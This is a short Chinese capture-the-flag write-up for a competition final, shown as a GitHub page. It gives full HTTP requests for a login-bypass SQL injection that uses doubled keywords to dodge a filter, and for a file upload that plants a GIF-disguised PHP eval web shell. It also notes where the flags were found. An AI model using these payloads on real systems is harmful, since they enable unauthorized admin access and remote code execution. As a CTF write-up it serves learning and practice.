Skip to content

Latest commit

 

History

History
75 lines (55 loc) · 2.34 KB

极客谷决赛.md

File metadata and controls

75 lines (55 loc) · 2.34 KB
Raw

靶机一

SQL注入进后台:

POST /admin/login.php?action=ck_login HTTP/1.1
Host: 1.13.159.141
Content-Length: 142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://1.13.159.141
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.13.159.141/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=28lhbrqtb1cpdnh8fa419h1oo6
Connection: close

user=-1' un union ion selselectect 5,'feng','c4ca4238a0b923820dcc509a6f75849b',1,0%23&password=1&code=266f&submit=true&submit.x=58&submit.y=20

然后后台有个上传getshell:

POST /admin/upload.php HTTP/1.1
Host: 1.13.159.141
Content-Length: 599
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://1.13.159.141
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6FXIf6KPenAM5cAE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.13.159.141/admin/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=2r7rst6mp0ih7tf33gmqsnr311
Connection: close

------WebKitFormBoundary6FXIf6KPenAM5cAE
Content-Disposition: form-data; name="get"


------WebKitFormBoundary6FXIf6KPenAM5cAE
Content-Disposition: form-data; name="up"; filename="1.php"
Content-Type: image/png

GIF89a <?php eval($_POST[0]);?>
------WebKitFormBoundary6FXIf6KPenAM5cAE
Content-Disposition: form-data; name="thumb_width"

300
------WebKitFormBoundary6FXIf6KPenAM5cAE
Content-Disposition: form-data; name="thumb_height"

200
------WebKitFormBoundary6FXIf6KPenAM5cAE
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary6FXIf6KPenAM5cAE--

在robots.txt里面,/var/www/html/flag.php里面还有/flag.txt里面发现flag。

靶机二

robots.txt里面有flag。